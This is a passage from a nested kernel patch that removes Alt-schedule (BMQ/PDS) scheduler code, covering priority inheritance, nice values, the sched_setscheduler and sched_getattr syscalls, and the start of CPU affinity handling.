-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_notrace_dynamic_enabled
-+#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
-+#define preempt_schedule_notrace_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
-+void __sched notrace dynamic_preempt_schedule_notrace(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
-+		return;
-+	preempt_schedule_notrace();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
-+EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
-+#endif
-+#endif
-+
-+#endif /* CONFIG_PREEMPTION */
-+
-+/*
-+ * This is the entry point to schedule() from kernel preemption
-+ * off of irq context.
-+ * Note, that this is called and return with irqs disabled. This will
-+ * protect us against recursive calling from irq.
-+ */
-+asmlinkage __visible void __sched preempt_schedule_irq(void)
-+{
-+	enum ctx_state prev_state;
-+
-+	/* Catch callers which need to be fixed */
-+	BUG_ON(preempt_count() || !irqs_disabled());
-+
-+	prev_state = exception_enter();
-+
-+	do {
-+		preempt_disable();
-+		local_irq_enable();
-+		__schedule(SM_PREEMPT);
-+		local_irq_disable();
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+
-+	exception_exit(prev_state);
-+}
-+
-+int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
-+			  void *key)
-+{
-+	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
-+	return try_to_wake_up(curr->private, mode, wake_flags);
-+}
-+EXPORT_SYMBOL(default_wake_function);
-+
-+static inline void check_task_changed(struct task_struct *p, struct rq *rq)
-+{
-+	int idx;
-+
-+	/* Trigger resched if task sched_prio has been modified. */
-+	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
-+		requeue_task(p, rq, idx);
-+		check_preempt_curr(rq);
-+	}
-+}
-+
-+static void __setscheduler_prio(struct task_struct *p, int prio)
-+{
-+	p->prio = prio;
-+}
-+
-+#ifdef CONFIG_RT_MUTEXES
-+
-+static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
-+{
-+	if (pi_task)
-+		prio = min(prio, pi_task->prio);
-+
-+	return prio;
-+}
-+
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	struct task_struct *pi_task = rt_mutex_get_top_task(p);
-+
-+	return __rt_effective_prio(pi_task, prio);
-+}
-+
-+/*
-+ * rt_mutex_setprio - set the current priority of a task
-+ * @p: task to boost
-+ * @pi_task: donor task
-+ *
-+ * This function changes the 'effective' priority of a task. It does
-+ * not touch ->normal_prio like __setscheduler().
-+ *
-+ * Used by the rt_mutex code to implement priority inheritance
-+ * logic. Call site only calls if the priority of the task changed.
-+ */
-+void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
-+{
-+	int prio;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	/* XXX used to be waiter->prio, not waiter->task->prio */
-+	prio = __rt_effective_prio(pi_task, p->normal_prio);
-+
-+	/*
-+	 * If nothing changed; bail early.
-+	 */
-+	if (p->pi_top_task == pi_task && prio == p->prio)
-+		return;
-+
-+	rq = __task_access_lock(p, &lock);
-+	/*
-+	 * Set under pi_lock && rq->lock, such that the value can be used under
-+	 * either lock.
-+	 *
-+	 * Note that there is loads of tricky to make this pointer cache work
-+	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
-+	 * ensure a task is de-boosted (pi_task is set to NULL) before the
-+	 * task is allowed to run again (and can exit). This ensures the pointer
-+	 * points to a blocked task -- which guarantees the task is present.
-+	 */
-+	p->pi_top_task = pi_task;
-+
-+	/*
-+	 * For FIFO/RR we only need to set prio, if that matches we're done.
-+	 */
-+	if (prio == p->prio)
-+		goto out_unlock;
-+
-+	/*
-+	 * Idle task boosting is a nono in general. There is one
-+	 * exception, when PREEMPT_RT and NOHZ is active:
-+	 *
-+	 * The idle task calls get_next_timer_interrupt() and holds
-+	 * the timer wheel base->lock on the CPU and another CPU wants
-+	 * to access the timer (probably to cancel it). We can safely
-+	 * ignore the boosting request, as the idle CPU runs this code
-+	 * with interrupts disabled and will complete the lock
-+	 * protected section without being interrupted. So there is no
-+	 * real need to boost.
-+	 */
-+	if (unlikely(p == rq->idle)) {
-+		WARN_ON(p != rq->curr);
-+		WARN_ON(p->pi_blocked_on);
-+		goto out_unlock;
-+	}
-+
-+	trace_sched_pi_setprio(p, pi_task);
-+
-+	__setscheduler_prio(p, prio);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+
-+	__balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+
-+	preempt_enable();
-+}
-+#else
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	return prio;
-+}
-+#endif
-+
-+void set_user_nice(struct task_struct *p, long nice)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
-+		return;
-+	/*
-+	 * We have to be careful, if called from sys_setpriority(),
-+	 * the task might be in the middle of scheduling on another CPU.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	p->static_prio = NICE_TO_PRIO(nice);
-+	/*
-+	 * The RT priorities are set via sched_setscheduler(), but we still
-+	 * allow the 'normal' nice value to be set - but as expected
-+	 * it won't have any effect on scheduling until the task is
-+	 * not SCHED_NORMAL/SCHED_BATCH:
-+	 */
-+	if (task_has_rt_policy(p))
-+		goto out_unlock;
-+
-+	p->prio = effective_prio(p);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+EXPORT_SYMBOL(set_user_nice);
-+
-+/*
-+ * is_nice_reduction - check if nice value is an actual reduction
-+ *
-+ * Similar to can_nice() but does not perform a capability check.
-+ *
-+ * @p: task
-+ * @nice: nice value
-+ */
-+static bool is_nice_reduction(const struct task_struct *p, const int nice)
-+{
-+	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
-+	int nice_rlim = nice_to_rlimit(nice);
-+
-+	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
-+}
-+
-+/*
-+ * can_nice - check if a task can reduce its nice value
-+ * @p: task
-+ * @nice: nice value
-+ */
-+int can_nice(const struct task_struct *p, const int nice)
-+{
-+	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
-+}
-+
-+#ifdef __ARCH_WANT_SYS_NICE
-+
-+/*
-+ * sys_nice - change the priority of the current process.
-+ * @increment: priority increment
-+ *
-+ * sys_setpriority is a more generic, but much slower function that
-+ * does similar things.
-+ */
-+SYSCALL_DEFINE1(nice, int, increment)
-+{
-+	long nice, retval;
-+
-+	/*
-+	 * Setpriority might change our priority at the same moment.
-+	 * We don't have to worry. Conceptually one call occurs first
-+	 * and we have a single winner.
-+	 */
-+
-+	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
-+	nice = task_nice(current) + increment;
-+
-+	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
-+	if (increment < 0 && !can_nice(current, nice))
-+		return -EPERM;
-+
-+	retval = security_task_setnice(current, nice);
-+	if (retval)
-+		return retval;
-+
-+	set_user_nice(current, nice);
-+	return 0;
-+}
-+
-+#endif
-+
-+/**
-+ * task_prio - return the priority value of a given task.
-+ * @p: the task in question.
-+ *
-+ * Return: The priority value as seen by users in /proc.
-+ *
-+ * sched policy         return value   kernel prio    user prio/nice
-+ *
-+ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
-+ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
-+ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
-+ */
-+int task_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
-+		task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+/**
-+ * idle_cpu - is a given CPU idle currently?
-+ * @cpu: the processor in question.
-+ *
-+ * Return: 1 if the CPU is currently idle. 0 otherwise.
-+ */
-+int idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (rq->curr != rq->idle)
-+		return 0;
-+
-+	if (rq->nr_running)
-+		return 0;
-+
-+#ifdef CONFIG_SMP
-+	if (rq->ttwu_pending)
-+		return 0;
-+#endif
-+
-+	return 1;
-+}
-+
-+/**
-+ * idle_task - return the idle task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * Return: The idle task for the cpu @cpu.
-+ */
-+struct task_struct *idle_task(int cpu)
-+{
-+	return cpu_rq(cpu)->idle;
-+}
-+
-+/**
-+ * find_process_by_pid - find a process with a matching PID value.
-+ * @pid: the pid in question.
-+ *
-+ * The task of @pid, if found. %NULL otherwise.
-+ */
-+static inline struct task_struct *find_process_by_pid(pid_t pid)
-+{
-+	return pid ? find_task_by_vpid(pid) : current;
-+}
-+
-+/*
-+ * sched_setparam() passes in -1 for its policy, to let the functions
-+ * it calls know not to change it.
-+ */
-+#define SETPARAM_POLICY -1
-+
-+static void __setscheduler_params(struct task_struct *p,
-+		const struct sched_attr *attr)
-+{
-+	int policy = attr->sched_policy;
-+
-+	if (policy == SETPARAM_POLICY)
-+		policy = p->policy;
-+
-+	p->policy = policy;
-+
-+	/*
-+	 * allow normal nice value to be set, but will not have any
-+	 * effect on scheduling until the task not SCHED_NORMAL/
-+	 * SCHED_BATCH
-+	 */
-+	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
-+
-+	/*
-+	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
-+	 * !rt_policy. Always setting this ensures that things like
-+	 * getparam()/getattr() don't report silly values for !rt tasks.
-+	 */
-+	p->rt_priority = attr->sched_priority;
-+	p->normal_prio = normal_prio(p);
-+}
-+
-+/*
-+ * check the target process has a UID that matches the current process's
-+ */
-+static bool check_same_owner(struct task_struct *p)
-+{
-+	const struct cred *cred = current_cred(), *pcred;
-+	bool match;
-+
-+	rcu_read_lock();
-+	pcred = __task_cred(p);
-+	match = (uid_eq(cred->euid, pcred->euid) ||
-+		 uid_eq(cred->euid, pcred->uid));
-+	rcu_read_unlock();
-+	return match;
-+}
-+
-+/*
-+ * Allow unprivileged RT tasks to decrease priority.
-+ * Only issue a capable test if needed and only once to avoid an audit
-+ * event on permitted non-privileged operations:
-+ */
-+static int user_check_sched_setscheduler(struct task_struct *p,
-+					 const struct sched_attr *attr,
-+					 int policy, int reset_on_fork)
-+{
-+	if (rt_policy(policy)) {
-+		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
-+
-+		/* Can't set/change the rt policy: */
-+		if (policy != p->policy && !rlim_rtprio)
-+			goto req_priv;
-+
-+		/* Can't increase priority: */
-+		if (attr->sched_priority > p->rt_priority &&
-+		    attr->sched_priority > rlim_rtprio)
-+			goto req_priv;
-+	}
-+
-+	/* Can't change other user's priorities: */
-+	if (!check_same_owner(p))
-+		goto req_priv;
-+
-+	/* Normal users shall not reset the sched_reset_on_fork flag: */
-+	if (p->sched_reset_on_fork && !reset_on_fork)
-+		goto req_priv;
-+
-+	return 0;
-+
-+req_priv:
-+	if (!capable(CAP_SYS_NICE))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
-+static int __sched_setscheduler(struct task_struct *p,
-+				const struct sched_attr *attr,
-+				bool user, bool pi)
-+{
-+	const struct sched_attr dl_squash_attr = {
-+		.size		= sizeof(struct sched_attr),
-+		.sched_policy	= SCHED_FIFO,
-+		.sched_nice	= 0,
-+		.sched_priority = 99,
-+	};
-+	int oldpolicy = -1, policy = attr->sched_policy;
-+	int retval, newprio;
-+	struct balance_callback *head;
-+	unsigned long flags;
-+	struct rq *rq;
-+	int reset_on_fork;
-+	raw_spinlock_t *lock;
-+
-+	/* The pi code expects interrupts enabled */
-+	BUG_ON(pi && in_interrupt());
-+
-+	/*
-+	 * Alt schedule FW supports SCHED_DEADLINE by squash it as prio 0 SCHED_FIFO
-+	 */
-+	if (unlikely(SCHED_DEADLINE == policy)) {
-+		attr = &dl_squash_attr;
-+		policy = attr->sched_policy;
-+	}
-+recheck:
-+	/* Double check policy once rq lock held */
-+	if (policy < 0) {
-+		reset_on_fork = p->sched_reset_on_fork;
-+		policy = oldpolicy = p->policy;
-+	} else {
-+		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
-+
-+		if (policy > SCHED_IDLE)
-+			return -EINVAL;
-+	}
-+
-+	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
-+		return -EINVAL;
-+
-+	/*
-+	 * Valid priorities for SCHED_FIFO and SCHED_RR are
-+	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
-+	 * SCHED_BATCH and SCHED_IDLE is 0.
-+	 */
-+	if (attr->sched_priority < 0 ||
-+	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
-+	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
-+		return -EINVAL;
-+	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
-+	    (attr->sched_priority != 0))
-+		return -EINVAL;
-+
-+	if (user) {
-+		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
-+		if (retval)
-+			return retval;
-+
-+		retval = security_task_setscheduler(p);
-+		if (retval)
-+			return retval;
-+	}
-+
-+	if (pi)
-+		cpuset_read_lock();
-+
-+	/*
-+	 * Make sure no PI-waiters arrive (or leave) while we are
-+	 * changing the priority of the task:
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+
-+	/*
-+	 * To be able to change p->policy safely, task_access_lock()
-+	 * must be called.
-+	 * IF use task_access_lock() here:
-+	 * For the task p which is not running, reading rq->stop is
-+	 * racy but acceptable as ->stop doesn't change much.
-+	 * An enhancemnet can be made to read rq->stop saftly.
-+	 */
-+	rq = __task_access_lock(p, &lock);
-+
-+	/*
-+	 * Changing the policy of the stop threads its a very bad idea
-+	 */
-+	if (p == rq->stop) {
-+		retval = -EINVAL;
-+		goto unlock;
-+	}
-+
-+	/*
-+	 * If not changing anything there's no need to proceed further:
-+	 */
-+	if (unlikely(policy == p->policy)) {
-+		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
-+			goto change;
-+		if (!rt_policy(policy) &&
-+		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
-+			goto change;
-+
-+		p->sched_reset_on_fork = reset_on_fork;
-+		retval = 0;
-+		goto unlock;
-+	}
-+change:
-+
-+	/* Re-check policy now with rq lock held */
-+	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
-+		policy = oldpolicy = -1;
-+		__task_access_unlock(p, lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+		if (pi)
-+			cpuset_read_unlock();
-+		goto recheck;
-+	}
-+
-+	p->sched_reset_on_fork = reset_on_fork;
-+
-+	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
-+	if (pi) {
-+		/*
-+		 * Take priority boosted tasks into account. If the new
-+		 * effective priority is unchanged, we just store the new
-+		 * normal parameters and do not touch the scheduler class and
-+		 * the runqueue. This will be done when the task deboost
-+		 * itself.
-+		 */
-+		newprio = rt_effective_prio(p, newprio);
-+	}
-+
-+	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
-+		__setscheduler_params(p, attr);
-+		__setscheduler_prio(p, newprio);
-+	}
-+
-+	check_task_changed(p, rq);
-+
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+	head = splice_balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	if (pi) {
-+		cpuset_read_unlock();
-+		rt_mutex_adjust_pi(p);
-+	}
-+
-+	/* Run balance callbacks after we've adjusted the PI chain: */
-+	balance_callbacks(rq, head);
-+	preempt_enable();
-+
-+	return 0;
-+
-+unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+	if (pi)
-+		cpuset_read_unlock();
-+	return retval;
-+}
-+
-+static int _sched_setscheduler(struct task_struct *p, int policy,
-+			       const struct sched_param *param, bool check)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy   = policy,
-+		.sched_priority = param->sched_priority,
-+		.sched_nice     = PRIO_TO_NICE(p->static_prio),
-+	};
-+
-+	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
-+	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
-+		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+		policy &= ~SCHED_RESET_ON_FORK;
-+		attr.sched_policy = policy;
-+	}
-+
-+	return __sched_setscheduler(p, &attr, check, true);
-+}
-+
-+/**
-+ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Use sched_set_fifo(), read its comment.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ *
-+ * NOTE that the task may be already dead.
-+ */
-+int sched_setscheduler(struct task_struct *p, int policy,
-+		       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, true);
-+}
-+
-+int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, true, true);
-+}
-+
-+int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, false, true);
-+}
-+EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
-+
-+/**
-+ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Just like sched_setscheduler, only don't bother checking if the
-+ * current context has permission.  For example, this is needed in
-+ * stop_machine(): we create temporary high priority worker threads,
-+ * but our caller might not have that capability.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+int sched_setscheduler_nocheck(struct task_struct *p, int policy,
-+			       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, false);
-+}
-+
-+/*
-+ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
-+ * incapable of resource management, which is the one thing an OS really should
-+ * be doing.
-+ *
-+ * This is of course the reason it is limited to privileged users only.
-+ *
-+ * Worse still; it is fundamentally impossible to compose static priority
-+ * workloads. You cannot take two correctly working static prio workloads
-+ * and smash them together and still expect them to work.
-+ *
-+ * For this reason 'all' FIFO tasks the kernel creates are basically at:
-+ *
-+ *   MAX_RT_PRIO / 2
-+ *
-+ * The administrator _MUST_ configure the system, the kernel simply doesn't
-+ * know enough information to make a sensible choice.
-+ */
-+void sched_set_fifo(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo);
-+
-+/*
-+ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
-+ */
-+void sched_set_fifo_low(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = 1 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo_low);
-+
-+void sched_set_normal(struct task_struct *p, int nice)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+		.sched_nice = nice,
-+	};
-+	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_normal);
-+
-+static int
-+do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
-+{
-+	struct sched_param lparam;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!param || pid < 0)
-+		return -EINVAL;
-+	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
-+		return -EFAULT;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setscheduler(p, policy, &lparam);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/*
-+ * Mimics kernel/events/core.c perf_copy_attr().
-+ */
-+static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
-+{
-+	u32 size;
-+	int ret;
-+
-+	/* Zero the full structure, so that a short copy will be nice: */
-+	memset(attr, 0, sizeof(*attr));
-+
-+	ret = get_user(size, &uattr->size);
-+	if (ret)
-+		return ret;
-+
-+	/* ABI compatibility quirk: */
-+	if (!size)
-+		size = SCHED_ATTR_SIZE_VER0;
-+
-+	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
-+		goto err_size;
-+
-+	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
-+	if (ret) {
-+		if (ret == -E2BIG)
-+			goto err_size;
-+		return ret;
-+	}
-+
-+	/*
-+	 * XXX: Do we want to be lenient like existing syscalls; or do we want
-+	 * to be strict and return an error on out-of-bounds values?
-+	 */
-+	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
-+
-+	/* sched/core.c uses zero here but we already know ret is zero */
-+	return 0;
-+
-+err_size:
-+	put_user(sizeof(*attr), &uattr->size);
-+	return -E2BIG;
-+}
-+
-+/**
-+ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
-+ * @pid: the pid in question.
-+ * @policy: new policy.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ * @param: structure containing the new RT priority.
-+ */
-+SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
-+{
-+	if (policy < 0)
-+		return -EINVAL;
-+
-+	return do_sched_setscheduler(pid, policy, param);
-+}
-+
-+/**
-+ * sys_sched_setparam - set/change the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
-+}
-+
-+/**
-+ * sys_sched_setattr - same as above, but with extended sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ */
-+SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
-+			       unsigned int, flags)
-+{
-+	struct sched_attr attr;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || flags)
-+		return -EINVAL;
-+
-+	retval = sched_copy_attr(uattr, &attr);
-+	if (retval)
-+		return retval;
-+
-+	if ((int)attr.sched_policy < 0)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setattr(p, &attr);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
-+ * @pid: the pid in question.
-+ *
-+ * Return: On success, the policy of the thread. Otherwise, a negative error
-+ * code.
-+ */
-+SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
-+{
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (pid < 0)
-+		goto out_nounlock;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (p) {
-+		retval = security_task_getscheduler(p);
-+		if (!retval)
-+			retval = p->policy;
-+	}
-+	rcu_read_unlock();
-+
-+out_nounlock:
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the RT priority.
-+ *
-+ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
-+ * code.
-+ */
-+SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	struct sched_param lp = { .sched_priority = 0 };
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (!param || pid < 0)
-+		goto out_nounlock;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	if (task_has_rt_policy(p))
-+		lp.sched_priority = p->rt_priority;
-+	rcu_read_unlock();
-+
-+	/*
-+	 * This one might sleep, we cannot do it with a spinlock held ...
-+	 */
-+	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
-+
-+out_nounlock:
-+	return retval;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/*
-+ * Copy the kernel size attribute structure (which might be larger
-+ * than what user-space knows about) to user-space.
-+ *
-+ * Note that all cases are valid: user-space buffer can be larger or
-+ * smaller than the kernel-space buffer. The usual case is that both
-+ * have the same size.
-+ */
-+static int
-+sched_attr_copy_to_user(struct sched_attr __user *uattr,
-+			struct sched_attr *kattr,
-+			unsigned int usize)
-+{
-+	unsigned int ksize = sizeof(*kattr);
-+
-+	if (!access_ok(uattr, usize))
-+		return -EFAULT;
-+
-+	/*
-+	 * sched_getattr() ABI forwards and backwards compatibility:
-+	 *
-+	 * If usize == ksize then we just copy everything to user-space and all is good.
-+	 *
-+	 * If usize < ksize then we only copy as much as user-space has space for,
-+	 * this keeps ABI compatibility as well. We skip the rest.
-+	 *
-+	 * If usize > ksize then user-space is using a newer version of the ABI,
-+	 * which part the kernel doesn't know about. Just ignore it - tooling can
-+	 * detect the kernel's knowledge of attributes from the attr->size value
-+	 * which is set to ksize in this case.
-+	 */
-+	kattr->size = min(usize, ksize);
-+
-+	if (copy_to_user(uattr, kattr, kattr->size))
-+		return -EFAULT;
-+
-+	return 0;
-+}
-+
-+/**
-+ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @usize: sizeof(attr) for fwd/bwd comp.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
-+		unsigned int, usize, unsigned int, flags)
-+{
-+	struct sched_attr kattr = { };
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
-+	    usize < SCHED_ATTR_SIZE_VER0 || flags)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	kattr.sched_policy = p->policy;
-+	if (p->sched_reset_on_fork)
-+		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+	if (task_has_rt_policy(p))
-+		kattr.sched_priority = p->rt_priority;
-+	else
-+		kattr.sched_nice = task_nice(p);
-+	kattr.sched_flags &= SCHED_FLAG_ALL;
-+
-+#ifdef CONFIG_UCLAMP_TASK
-+	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
-+	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
-+#endif
-+
-+	rcu_read_unlock();
-+
-+	return sched_attr_copy_to_user(uattr, &kattr, usize);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	int retval;
-+	cpumask_var_t cpus_allowed, new_mask;
-+
-+	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
-+		retval = -ENOMEM;
-+		goto out_free_cpus_allowed;
-+	}
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	cpumask_and(new_mask, mask, cpus_allowed);
-+again:
-+	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
-+	if (retval)
-+		goto out_free_new_mask;
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	if (!cpumask_subset(new_mask, cpus_allowed)) {
-+		/*
-+		 * We must have raced with a concurrent cpuset
-+		 * update. Just reset the cpus_allowed to the
-+		 * cpuset's cpus_allowed
-+		 */
-+		cpumask_copy(new_mask, cpus_allowed);
-+		goto again;
-+	}
-+
-+out_free_new_mask:
-+	free_cpumask_var(new_mask);
-+out_free_cpus_allowed:
-+	free_cpumask_var(cpus_allowed);
-+	return retval;
-+}
-+
-+long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	rcu_read_lock();
-+
